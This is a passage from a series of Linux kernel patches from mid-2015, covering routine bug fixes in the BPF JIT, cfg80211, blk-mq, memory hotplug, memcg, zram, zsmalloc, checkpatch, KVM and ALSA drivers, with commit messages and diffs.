+ + if (jit->seen & SEEN_STACK) + off = STK_OFF_TCCNT + STK_OFF; + else + off = STK_OFF_TCCNT; + /* lhi %w0,1 */ + EMIT4_IMM(0xa7080000, REG_W0, 1); + /* laal %w1,%w0,off(%r15) */ + EMIT6_DISP_LH(0xeb000000, 0x00fa, REG_W1, REG_W0, REG_15, off); + /* clij %w1,MAX_TAIL_CALL_CNT,0x2,label0 */ + EMIT6_PCREL_IMM_LABEL(0xec000000, 0x007f, REG_W1, + MAX_TAIL_CALL_CNT, 0, 0x2); + + /* + * prog = array->prog[index]; + * if (prog == NULL) + * goto out; + */ + + /* sllg %r1,%b3,3: %r1 = index * 8 */ + EMIT6_DISP_LH(0xeb000000, 0x000d, REG_1, BPF_REG_3, REG_0, 3); + /* lg %r1,prog(%b2,%r1) */ + EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, BPF_REG_2, + REG_1, offsetof(struct bpf_array, prog)); + /* clgij %r1,0,0x8,label0 */ + EMIT6_PCREL_IMM_LABEL(0xec000000, 0x007d, REG_1, 0, 0, 0x8); + + /* + * Restore registers before calling function + */ + save_restore_regs(jit, REGS_RESTORE); + + /* + * goto *(prog->bpf_func + tail_call_start); + */ + + /* lg %r1,bpf_func(%r1) */ + EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0, + offsetof(struct bpf_prog, bpf_func)); + /* bc 0xf,tail_call_start(%r1) */ + _EMIT4(0x47f01000 + jit->tail_call_start); + /* out: */ + jit->labels[0] = jit->prg; + break; case BPF_JMP | BPF_EXIT: /* return b0 */ last = (i == fp->len - 1) ? 1 : 0; if (last && !(jit->seen & SEEN_RET0)) From 9c5a18a31b321f120efda412281bb9f610f84aa0 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 9 Jun 2015 21:35:44 +0200 Subject: [PATCH 797/872] cfg80211: wext: clear sinfo struct before calling driver Until recently, mac80211 overwrote all the statistics it could provide when getting called, but it now relies on the struct having been zeroed by the caller. This was always the case in nl80211, but wext used a static struct which could even cause values from one device leak to another. Using a static struct is OK (as even documented in a comment) since the whole usage of this function and its return value is always locked under RTNL. Not clearing the struct for calling the driver has always been wrong though, since drivers were free to only fill values they could report, so calling this for one device and then for another would always have leaked values from one to the other. Fix this by initializing the structure in question before the driver method call. This fixes https://bugzilla.kernel.org/show_bug.cgi?id=99691 Cc: stable@vger.kernel.org Reported-by: Gerrit Renker Reported-by: Alexander Kaltsas Signed-off-by: Johannes Berg Signed-off-by: David S. Miller --- net/wireless/wext-compat.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/wireless/wext-compat.c b/net/wireless/wext-compat.c index fff1bef6ed6d..fd682832a0e3 100644 --- a/net/wireless/wext-compat.c +++ b/net/wireless/wext-compat.c @@ -1333,6 +1333,8 @@ static struct iw_statistics *cfg80211_wireless_stats(struct net_device *dev) memcpy(bssid, wdev->current_bss->pub.bssid, ETH_ALEN); wdev_unlock(wdev); + memset(&sinfo, 0, sizeof(sinfo)); + if (rdev_get_station(rdev, dev, bssid, &sinfo)) return NULL; From c3b4afca7023b5aa0531912364246e67f79b3010 Mon Sep 17 00:00:00 2001 From: Ming Lei Date: Thu, 4 Jun 2015 22:25:04 +0800 Subject: [PATCH 798/872] blk-mq: free hctx->ctxs in queue's release handler Now blk_cleanup_queue() can be called before calling del_gendisk()[1], inside which hctx->ctxs is touched from blk_mq_unregister_hctx(), but the variable has been freed by blk_cleanup_queue() at that time. So this patch moves freeing of hctx->ctxs into queue's release handler for fixing the oops reported by Stefan. [1], 6cd18e711dd8075 (block: destroy bdi before blockdev is unregistered) Reported-by: Stefan Seyfried Cc: NeilBrown Cc: Christoph Hellwig Cc: stable@vger.kernel.org (v4.0) Signed-off-by: Ming Lei Signed-off-by: Jens Axboe --- block/blk-mq.c | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/block/blk-mq.c b/block/blk-mq.c index e68b71b85a7e..594eea04266e 100644 --- a/block/blk-mq.c +++ b/block/blk-mq.c @@ -1600,6 +1600,7 @@ static int blk_mq_hctx_notify(void *data, unsigned long action, return NOTIFY_OK; } +/* hctx->ctxs will be freed in queue's release handler */ static void blk_mq_exit_hctx(struct request_queue *q, struct blk_mq_tag_set *set, struct blk_mq_hw_ctx *hctx, unsigned int hctx_idx) @@ -1618,7 +1619,6 @@ static void blk_mq_exit_hctx(struct request_queue *q, blk_mq_unregister_cpu_notifier(&hctx->cpu_notifier); blk_free_flush_queue(hctx->fq); - kfree(hctx->ctxs); blk_mq_free_bitmap(&hctx->ctx_map); } @@ -1891,8 +1891,12 @@ void blk_mq_release(struct request_queue *q) unsigned int i; /* hctx kobj stays in hctx */ - queue_for_each_hw_ctx(q, hctx, i) + queue_for_each_hw_ctx(q, hctx, i) { + if (!hctx) + continue; + kfree(hctx->ctxs); kfree(hctx); + } kfree(q->queue_hw_ctx); From 330f993aa0897aecdd9e20cce81183aeb5eef765 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Wed, 10 Jun 2015 11:01:42 +0900 Subject: [PATCH 799/872] lib: update build parameters for make testbin Signed-off-by: Hajime Tazaki --- tools/testing/libos/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/testing/libos/Makefile b/tools/testing/libos/Makefile index 3da25429382b..a27eb84e7712 100644 --- a/tools/testing/libos/Makefile +++ b/tools/testing/libos/Makefile @@ -19,7 +19,7 @@ testbin: bake check_pkgs cd buildtop ; \ ../bake/bake.py download ; \ ../bake/bake.py update ; \ - ../bake/bake.py build + ../bake/bake.py build $(BAKEBUILD_PARAMS) test: @./dce-test.sh ADD_PARAM=$(ADD_PARAM) From 98a226ed21949601b270f7ea20abc9f72f7b0be9 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 10 Jun 2015 10:27:00 +0200 Subject: [PATCH 800/872] ALSA: hda - Don't actually write registers for caps overwrites Along with the transition to regmap for managing the cached parameter reads, the caps overwrite was also moved to regmap cache. The cache change itself works, but it still tries to write the non-existing verb (the HDA parameter is read-only) wrongly. It's harmless in most cases, but some chips are picky and may result in the codec communication stall. This patch avoids it just by adding the missing flag check in reg_write ops. Signed-off-by: Takashi Iwai --- sound/hda/hdac_regmap.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c index 7371e0c3926f..c4f5e61d4404 100644 --- a/sound/hda/hdac_regmap.c +++ b/sound/hda/hdac_regmap.c @@ -265,6 +265,9 @@ static int hda_reg_write(void *context, unsigned int reg, unsigned int val) unsigned int verb; int i, bytes, err; + if (codec->caps_overwriting) + return 0; + reg &= ~0x00080000U; /* drop GET bit */ reg |= (codec->addr << 28); verb = get_verb(reg); From 34b1252bd91851f77f89fbb6829a04efad900f41 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Wed, 10 Jun 2015 10:23:29 +0200 Subject: [PATCH 801/872] MIPS: Cobalt: Do not build MTD platform device registration code as module. If CONFIG_MTD_PHYSMAP is set to m, the Cobalt mtd.ko module might get unloaded while the drivers/mtd modules are still loaded resulting in stale references to the destroyed platform_device instance. Anyway, platform devices should always be registered indicated what devices are present, _not_ what drivers have been configured. Signed-off-by: Ralf Baechle --- arch/mips/cobalt/Makefile | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/mips/cobalt/Makefile b/arch/mips/cobalt/Makefile index 558e94977942..68f0c5871adc 100644 --- a/arch/mips/cobalt/Makefile +++ b/arch/mips/cobalt/Makefile @@ -2,7 +2,6 @@ # Makefile for the Cobalt micro systems family specific parts of the kernel # -obj-y := buttons.o irq.o lcd.o led.o reset.o rtc.o serial.o setup.o time.o +obj-y := buttons.o irq.o lcd.o led.o mtd.o reset.o rtc.o serial.o setup.o time.o obj-$(CONFIG_PCI) += pci.o -obj-$(CONFIG_MTD_PHYSMAP) += mtd.o From d9fb5660459819513d510e72caa3120a7cf41ee1 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Tue, 9 Jun 2015 09:35:34 +0200 Subject: [PATCH 802/872] MIPS: Loongson: Do not register 8250 platform device from module. If CONFIG_SERIAL_8250 is set to m, the Loongson seria.ko module might get unloaded while the serial driver modules are still loaded resulting in stale references to the destroyed platform_device instance. Anyway, platform devices should always be registered indicated what devices are present, _not_ what drivers have been configured. Signed-off-by: Ralf Baechle Reported-by: Paul Gortmaker Patchwork: https://patchwork.linux-mips.org/patch/10538/ --- arch/mips/loongson/common/Makefile | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/arch/mips/loongson/common/Makefile b/arch/mips/loongson/common/Makefile index e70c33fdb881..f2e8153e44f5 100644 --- a/arch/mips/loongson/common/Makefile +++ b/arch/mips/loongson/common/Makefile @@ -3,15 +3,13 @@ # obj-y += setup.o init.o cmdline.o env.o time.o reset.o irq.o \ - bonito-irq.o mem.o machtype.o platform.o + bonito-irq.o mem.o machtype.o platform.o serial.o obj-$(CONFIG_PCI) += pci.o # # Serial port support # obj-$(CONFIG_EARLY_PRINTK) += early_printk.o -loongson-serial-$(CONFIG_SERIAL_8250) := serial.o -obj-y += $(loongson-serial-m) $(loongson-serial-y) obj-$(CONFIG_LOONGSON_UART_BASE) += uart_base.o obj-$(CONFIG_LOONGSON_MC146818) += rtc.o From 9cc719ab3f4f639d629ac8ff09e9b998bc006f68 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Sat, 23 May 2015 01:20:19 +0200 Subject: [PATCH 803/872] MIPS: MSA: bugfix - disable MSA correctly for new threads/processes. Due to the slightly odd way that new threads and processes start execution when scheduled for the very first time they were bypassing the required disable_msa call. Signed-off-by: Ralf Baechle --- arch/mips/include/asm/switch_to.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/include/asm/switch_to.h b/arch/mips/include/asm/switch_to.h index e92d6c4b5ed1..7163cd7fdd69 100644 --- a/arch/mips/include/asm/switch_to.h +++ b/arch/mips/include/asm/switch_to.h @@ -104,7 +104,6 @@ do { \ if (test_and_clear_tsk_thread_flag(prev, TIF_USEDMSA)) \ __fpsave = FP_SAVE_VECTOR; \ (last) = resume(prev, next, task_thread_info(next), __fpsave); \ - disable_msa(); \ } while (0) #define finish_arch_switch(prev) \ @@ -122,6 +121,7 @@ do { \ if (cpu_has_userlocal) \ write_c0_userlocal(current_thread_info()->tp_value); \ __restore_watch(); \ + disable_msa(); \ } while (0) #endif /* _ASM_SWITCH_TO_H */ From 5eea900389f73ad715649e3c3e78fc4482248635 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Fri, 1 May 2015 05:59:35 -0700 Subject: [PATCH 804/872] blackfin: Fix build error Fix include/asm-generic/io.h: In function 'readb': include/asm-generic/io.h:113:2: error: implicit declaration of function 'bfin_read8' include/asm-generic/io.h: In function 'readw': include/asm-generic/io.h:121:2: error: implicit declaration of function 'bfin_read16' include/asm-generic/io.h: In function 'readl': include/asm-generic/io.h:129:2: error: implicit declaration of function 'bfin_read32' include/asm-generic/io.h: In function 'writeb': include/asm-generic/io.h:147:2: error: implicit declaration of function 'bfin_write8' include/asm-generic/io.h: In function 'writew': include/asm-generic/io.h:155:2: error: implicit declaration of function 'bfin_write16' include/asm-generic/io.h: In function 'writel': include/asm-generic/io.h:163:2: error: implicit declaration of function 'bfin_write32' Reported-by: Geert Uytterhoeven Fixes: 1a3372bc522ef ("blackfin: io: define __raw_readx/writex with bfin_readx/writex") Cc: Steven Miao Signed-off-by: Guenter Roeck --- arch/blackfin/include/asm/io.h | 1 + 1 file changed, 1 insertion(+) diff --git a/arch/blackfin/include/asm/io.h b/arch/blackfin/include/asm/io.h index 4e8ad0523118..6abebe82d4e9 100644 --- a/arch/blackfin/include/asm/io.h +++ b/arch/blackfin/include/asm/io.h @@ -10,6 +10,7 @@ #include #include #include +#include #define __raw_readb bfin_read8 #define __raw_readw bfin_read16 From 80524e933658077842271fbf34e6861c41095a32 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Wed, 15 Apr 2015 08:33:50 -0700 Subject: [PATCH 805/872] score: Fix exception handler label The latest version of modinfo fails to compile score architecture targets with the following error. FATAL: The relocation at __ex_table+0x634 references section "__ex_table" which is not executable, IOW the kernel will fault if it ever tries to jump to it. Something is seriously wrong and should be fixed. The probem is caused by a bad label in an __ex_table entry. Acked-by: Lennox Wu Cc: Quentin Casasnovas Signed-off-by: Guenter Roeck --- arch/score/lib/string.S | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/score/lib/string.S b/arch/score/lib/string.S index 00b7d3a2fc60..16efa3ad037f 100644 --- a/arch/score/lib/string.S +++ b/arch/score/lib/string.S @@ -175,10 +175,10 @@ ENTRY(__clear_user) br r3 .section .fixup, "ax" +99: br r3 .previous .section __ex_table, "a" .align 2 -99: .word 0b, 99b .previous From 1b0ccfe54a6abd1bc4d7bdd1c33e61e2c58f72c7 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Wed, 10 Jun 2015 15:29:31 -0700 Subject: [PATCH 806/872] Revert "ipv6: Fix protocol resubmission" This reverts commit 0243508edd317ff1fa63b495643a7c192fbfcd92. It introduces new regressions. Signed-off-by: David S. Miller --- net/ipv6/ip6_input.c | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c index 41a73da371a9..f2e464eba5ef 100644 --- a/net/ipv6/ip6_input.c +++ b/net/ipv6/ip6_input.c @@ -212,13 +212,13 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) */ rcu_read_lock(); +resubmit: idev = ip6_dst_idev(skb_dst(skb)); if (!pskb_pull(skb, skb_transport_offset(skb))) goto discard; nhoff = IP6CB(skb)->nhoff; nexthdr = skb_network_header(skb)[nhoff]; -resubmit: raw = raw6_local_deliver(skb, nexthdr); ipprot = rcu_dereference(inet6_protos[nexthdr]); if (ipprot) { @@ -246,12 +246,10 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) goto discard; ret = ipprot->handler(skb); - if (ret < 0) { - nexthdr = -ret; + if (ret > 0) goto resubmit; - } else if (ret == 0) { + else if (ret == 0) IP6_INC_STATS_BH(net, idev, IPSTATS_MIB_INDELIVERS); - } } else { if (!raw) { if (xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) { From 85bd839983778fcd0c1c043327b14a046e979b39 Mon Sep 17 00:00:00 2001 From: Gu Zheng Date: Wed, 10 Jun 2015 11:14:43 -0700 Subject: [PATCH 807/872] mm/memory_hotplug.c: set zone->wait_table to null after freeing it Izumi found the following oops when hot re-adding a node: BUG: unable to handle kernel paging request at ffffc90008963690 IP: __wake_up_bit+0x20/0x70 Oops: 0000 [#1] SMP CPU: 68 PID: 1237 Comm: rs:main Q:Reg Not tainted 4.1.0-rc5 #80 Hardware name: FUJITSU PRIMEQUEST2800E/SB, BIOS PRIMEQUEST 2000 Series BIOS Version 1.87 04/28/2015 task: ffff880838df8000 ti: ffff880017b94000 task.ti: ffff880017b94000 RIP: 0010:[] [] __wake_up_bit+0x20/0x70 RSP: 0018:ffff880017b97be8 EFLAGS: 00010246 RAX: ffffc90008963690 RBX: 00000000003c0000 RCX: 000000000000a4c9 RDX: 0000000000000000 RSI: ffffea101bffd500 RDI: ffffc90008963648 RBP: ffff880017b97c08 R08: 0000000002000020 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8a0797c73800 R13: ffffea101bffd500 R14: 0000000000000001 R15: 00000000003c0000 FS: 00007fcc7ffff700(0000) GS:ffff880874800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffc90008963690 CR3: 0000000836761000 CR4: 00000000001407e0 Call Trace: unlock_page+0x6d/0x70 generic_write_end+0x53/0xb0 xfs_vm_write_end+0x29/0x80 [xfs] generic_perform_write+0x10a/0x1e0 xfs_file_buffered_aio_write+0x14d/0x3e0 [xfs] xfs_file_write_iter+0x79/0x120 [xfs] __vfs_write+0xd4/0x110 vfs_write+0xac/0x1c0 SyS_write+0x58/0xd0 system_call_fastpath+0x12/0x76 Code: 5d c3 66 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 48 83 ec 20 65 48 8b 04 25 28 00 00 00 48 89 45 f8 31 c0 48 8d 47 48 <48> 39 47 48 48 c7 45 e8 00 00 00 00 48 c7 45 f0 00 00 00 00 48 RIP [] __wake_up_bit+0x20/0x70 RSP CR2: ffffc90008963690 Reproduce method (re-add a node):: Hot-add nodeA --> remove nodeA --> hot-add nodeA (panic) This seems an use-after-free problem, and the root cause is zone->wait_table was not set to *NULL* after free it in try_offline_node. When hot re-add a node, we will reuse the pgdat of it, so does the zone struct, and when add pages to the target zone, it will init the zone first (including the wait_table) if the zone is not initialized. The judgement of zone initialized is based on zone->wait_table: static inline bool zone_is_initialized(struct zone *zone) { return !!zone->wait_table; } so if we do not set the zone->wait_table to *NULL* after free it, the memory hotplug routine will skip the init of new zone when hot re-add the node, and the wait_table still points to the freed memory, then we will access the invalid address when trying to wake up the waiting people after the i/o operation with the page is done, such as mentioned above. Signed-off-by: Gu Zheng Reported-by: Taku Izumi Reviewed by: Yasuaki Ishimatsu Cc: KAMEZAWA Hiroyuki Cc: Tang Chen Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memory_hotplug.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c index 457bde530cbe..9e88f749aa51 100644 --- a/mm/memory_hotplug.c +++ b/mm/memory_hotplug.c @@ -1969,8 +1969,10 @@ void try_offline_node(int nid) * wait_table may be allocated from boot memory, * here only free if it's allocated by vmalloc. */ - if (is_vmalloc_addr(zone->wait_table)) + if (is_vmalloc_addr(zone->wait_table)) { vfree(zone->wait_table); + zone->wait_table = NULL; + } } } EXPORT_SYMBOL(try_offline_node); From 7d638093d4b0e9ef15bd78f38f11f126e773cc14 Mon Sep 17 00:00:00 2001 From: Vladimir Davydov Date: Wed, 10 Jun 2015 11:14:46 -0700 Subject: [PATCH 808/872] memcg: do not call reclaim if !__GFP_WAIT When trimming memcg consumption excess (see memory.high), we call try_to_free_mem_cgroup_pages without checking if we are allowed to sleep in the current context, which can result in a deadlock. Fix this. Fixes: 241994ed8649 ("mm: memcontrol: default hierarchy interface for memory") Signed-off-by: Vladimir Davydov Cc: Johannes Weiner Acked-by: Michal Hocko Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memcontrol.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/mm/memcontrol.c b/mm/memcontrol.c index 14c2f2017e37..9da23a7ec4c0 100644 --- a/mm/memcontrol.c +++ b/mm/memcontrol.c @@ -2323,6 +2323,8 @@ static int try_charge(struct mem_cgroup *memcg, gfp_t gfp_mask, css_get_many(&memcg->css, batch); if (batch > nr_pages) refill_stock(memcg, batch - nr_pages); + if (!(gfp_mask & __GFP_WAIT)) + goto done; /* * If the hierarchy is above the normal consumption range, * make the charging task trim their excess contribution. From d7ad41a1c498729b7584c257710b1b437a0c1470 Mon Sep 17 00:00:00 2001 From: Weijie Yang Date: Wed, 10 Jun 2015 11:14:49 -0700 Subject: [PATCH 809/872] zram: clear disk io accounting when reset zram device Clear zram disk io accounting when resetting the zram device. Otherwise the residual io accounting stat will affect the diskstat in the next zram active cycle. Signed-off-by: Weijie Yang Acked-by: Sergey Senozhatsky Acked-by: Minchan Kim Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- drivers/block/zram/zram_drv.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/block/zram/zram_drv.c b/drivers/block/zram/zram_drv.c index 8dcbced0eafd..6e134f4759c0 100644 --- a/drivers/block/zram/zram_drv.c +++ b/drivers/block/zram/zram_drv.c @@ -805,7 +805,9 @@ static void zram_reset_device(struct zram *zram) memset(&zram->stats, 0, sizeof(zram->stats)); zram->disksize = 0; zram->max_comp_streams = 1; + set_capacity(zram->disk, 0); + part_stat_set_all(&zram->disk->part0, 0); up_write(&zram->init_lock); /* I/O operation under all of CPU are done so let's free */ From 5129e87cb81996d4d7e8f5a86b5355c5f2d0383b Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Wed, 10 Jun 2015 11:14:52 -0700 Subject: [PATCH 810/872] checkpatch: fix "GLOBAL_INITIALISERS" test Commit d5e616fc1c1d ("checkpatch: add a few more --fix corrections") broke the GLOBAL_INITIALISERS test with bad parentheses and optional leading spaces. Fix it. Signed-off-by: Joe Perches Reported-by: Bandan Das Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- scripts/checkpatch.pl | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scripts/checkpatch.pl b/scripts/checkpatch.pl index 89b1df4e72ab..c5ec977b9c37 100755 --- a/scripts/checkpatch.pl +++ b/scripts/checkpatch.pl @@ -3169,12 +3169,12 @@ sub process { } # check for global initialisers. - if ($line =~ /^\+(\s*$Type\s*$Ident\s*(?:\s+$Modifier))*\s*=\s*(0|NULL|false)\s*;/) { + if ($line =~ /^\+$Type\s*$Ident(?:\s+$Modifier)*\s*=\s*(?:0|NULL|false)\s*;/) { if (ERROR("GLOBAL_INITIALISERS", "do not initialise globals to 0 or NULL\n" . $herecurr) && $fix) { - $fixed[$fixlinenr] =~ s/($Type\s*$Ident\s*(?:\s+$Modifier))*\s*=\s*(0|NULL|false)\s*;/$1;/; + $fixed[$fixlinenr] =~ s/(^.$Type\s*$Ident(?:\s+$Modifier)*)\s*=\s*(0|NULL|false)\s*;/$1;/; } } # check for static initialisers. From f371763a79d5212c2cb216b46fa8af46ba56cee3 Mon Sep 17 00:00:00 2001 From: Johannes Weiner Date: Wed, 10 Jun 2015 11:14:54 -0700 Subject: [PATCH 811/872] mm: memcontrol: fix false-positive VM_BUG_ON() on -rt On -rt, the VM_BUG_ON(!irqs_disabled()) triggers inside the memcg swapout path because the spin_lock_irq(&mapping->tree_lock) in the caller doesn't actually disable the hardware interrupts - which is fine, because on -rt the tophalves run in process context and so we are still safe from preemption while updating the statistics. Remove the VM_BUG_ON() but keep the comment of what we rely on. Signed-off-by: Johannes Weiner Reported-by: Clark Williams Cc: Fernando Lopez-Lezcano Cc: Steven Rostedt Cc: Thomas Gleixner Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memcontrol.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/mm/memcontrol.c b/mm/memcontrol.c index 9da23a7ec4c0..a04225d372ba 100644 --- a/mm/memcontrol.c +++ b/mm/memcontrol.c @@ -5835,9 +5835,7 @@ void mem_cgroup_swapout(struct page *page, swp_entry_t entry) if (!mem_cgroup_is_root(memcg)) page_counter_uncharge(&memcg->memory, 1); - /* XXX: caller holds IRQ-safe mapping->tree_lock */ - VM_BUG_ON(!irqs_disabled()); - + /* Caller disabled preemption with mapping->tree_lock */ mem_cgroup_charge_statistics(memcg, page, -1); memcg_check_events(memcg, page); } From 02f7b4145da113683ad64c74bf64605e16b71789 Mon Sep 17 00:00:00 2001 From: Sergey Senozhatsky Date: Wed, 10 Jun 2015 11:14:57 -0700 Subject: [PATCH 812/872] zsmalloc: fix a null pointer dereference in destroy_handle_cache() If zs_create_pool()->create_handle_cache()->kmem_cache_create() or pool->name allocation fails, zs_create_pool()->destroy_handle_cache() will dereference the NULL pool->handle_cachep. Modify destroy_handle_cache() to avoid this. Signed-off-by: Sergey Senozhatsky Cc: Minchan Kim Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/zsmalloc.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm/zsmalloc.c b/mm/zsmalloc.c index 08bd7a3d464a..a8b5e749e84e 100644 --- a/mm/zsmalloc.c +++ b/mm/zsmalloc.c @@ -289,7 +289,8 @@ static int create_handle_cache(struct zs_pool *pool) static void destroy_handle_cache(struct zs_pool *pool) { - kmem_cache_destroy(pool->handle_cachep); + if (pool->handle_cachep) + kmem_cache_destroy(pool->handle_cachep); } static unsigned long alloc_handle(struct zs_pool *pool) From 8e76d4eecf7afeec9328e21cd5880e281838d0d6 Mon Sep 17 00:00:00 2001 From: Mel Gorman Date: Wed, 10 Jun 2015 11:15:00 -0700 Subject: [PATCH 813/872] sched, numa: do not hint for NUMA balancing on VM_MIXEDMAP mappings Jovi Zhangwei reported the following problem Below kernel vm bug can be triggered by tcpdump which mmaped a lot of pages with GFP_COMP flag. [Mon May 25 05:29:33 2015] page:ffffea0015414000 count:66 mapcount:1 mapping: (null) index:0x0 [Mon May 25 05:29:33 2015] flags: 0x20047580004000(head) [Mon May 25 05:29:33 2015] page dumped because: VM_BUG_ON_PAGE(compound_order(page) && !PageTransHuge(page)) [Mon May 25 05:29:33 2015] ------------[ cut here ]------------ [Mon May 25 05:29:33 2015] kernel BUG at mm/migrate.c:1661! [Mon May 25 05:29:33 2015] invalid opcode: 0000 [#1] SMP In this case it was triggered by running tcpdump but it's not necessary reproducible on all systems. sudo tcpdump -i bond0.100 'tcp port 4242' -c 100000000000 -w 4242.pcap Compound pages cannot be migrated and it was not expected that such pages be marked for NUMA balancing. This did not take into account that drivers such as net/packet/af_packet.c may insert compound pages into userspace with vm_insert_page. This patch tells the NUMA balancing protection scanner to skip all VM_MIXEDMAP mappings which avoids the possibility that compound pages are marked for migration. Signed-off-by: Mel Gorman Reported-by: Jovi Zhangwei Cc: Ingo Molnar Cc: Peter Zijlstra Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- kernel/sched/fair.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c index ffeaa4105e48..c2980e8733bc 100644 --- a/kernel/sched/fair.c +++ b/kernel/sched/fair.c @@ -2181,7 +2181,7 @@ void task_numa_work(struct callback_head *work) } for (; vma; vma = vma->vm_next) { if (!vma_migratable(vma) || !vma_policy_mof(vma) || - is_vm_hugetlb_page(vma)) { + is_vm_hugetlb_page(vma) || (vma->vm_flags & VM_MIXEDMAP)) { continue; } From 5ec45a192fe6e287f0fc06d5ca4f3bd446d94803 Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Wed, 10 Jun 2015 11:15:02 -0700 Subject: [PATCH 814/872] arch/x86/kvm/mmu.c: work around gcc-4.4.4 bug Fix this compile issue with gcc-4.4.4: arch/x86/kvm/mmu.c: In function 'kvm_mmu_pte_write': arch/x86/kvm/mmu.c:4256: error: unknown field 'cr0_wp' specified in initializer arch/x86/kvm/mmu.c:4257: error: unknown field 'cr4_pae' specified in initializer arch/x86/kvm/mmu.c:4257: warning: excess elements in union initializer ... gcc-4.4.4 (at least) has issues when using anonymous unions in initializers. Fixes: edc90b7dc4ceef6 ("KVM: MMU: fix SMAP virtualization") Cc: Xiao Guangrong Cc: Paolo Bonzini Cc: Davidlohr Bueso Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- arch/x86/kvm/mmu.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/x86/kvm/mmu.c b/arch/x86/kvm/mmu.c index 44a7d2515497..b73337634214 100644 --- a/arch/x86/kvm/mmu.c +++ b/arch/x86/kvm/mmu.c @@ -4215,13 +4215,13 @@ void kvm_mmu_pte_write(struct kvm_vcpu *vcpu, gpa_t gpa, u64 entry, gentry, *spte; int npte; bool remote_flush, local_flush, zap_page; - union kvm_mmu_page_role mask = (union kvm_mmu_page_role) { - .cr0_wp = 1, - .cr4_pae = 1, - .nxe = 1, - .smep_andnot_wp = 1, - .smap_andnot_wp = 1, - }; + union kvm_mmu_page_role mask = { }; + + mask.cr0_wp = 1; + mask.cr4_pae = 1; + mask.nxe = 1; + mask.smep_andnot_wp = 1; + mask.smap_andnot_wp = 1; /* * If we don't have indirect shadow pages, it means no page is From bf06848bdbe549175d25d2327ab9f37d4bd556b7 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 10 Jun 2015 12:03:49 +0200 Subject: [PATCH 815/872] ALSA: hda - Continue probing even if i915 binding fails Currently snd-hda-intel driver aborts the probing of Intel HD-audio controller with i915 power well management when binding with i915 driver via hda_i915_init() fails. This is no big problem for Haswell and Broadwell where the HD-audio controllers are dedicated to HDMI/DP, thus i915 link is mandatory. However, Skylake, Baytrail and Braswell have only one controller and both HDMI/DP and analog codecs share the same bus. Thus, even if HDMI/DP isn't usable, we should keep the controller working for other codecs. For fixing this, this patch simply allows continuing the probing even if hda_i915_init() call fails. This may leave stale sound components for HDMI/DP devices that are unbound with graphics. We could abort the probing selectively, but from the code simplicity POV, it's better to continue in all cases. Reported-by: Libin Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index fea198c58196..8a0af6770e1d 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -1855,7 +1855,7 @@ static int azx_probe_continue(struct azx *chip) #ifdef CONFIG_SND_HDA_I915 err = hda_i915_init(hda); if (err < 0) - goto out_free; + goto skip_i915; err = hda_display_power(hda, true); if (err < 0) { dev_err(chip->card->dev, @@ -1865,6 +1865,7 @@ static int azx_probe_continue(struct azx *chip) #endif } + skip_i915: err = azx_first_init(chip); if (err < 0) goto out_free; From b3be5e3e726a6cc849f40c70c3ae525e4146e9df Mon Sep 17 00:00:00 2001 From: Erik Hugne Date: Tue, 9 Jun 2015 17:27:12 +0200 Subject: [PATCH 816/872] tipc: disconnect 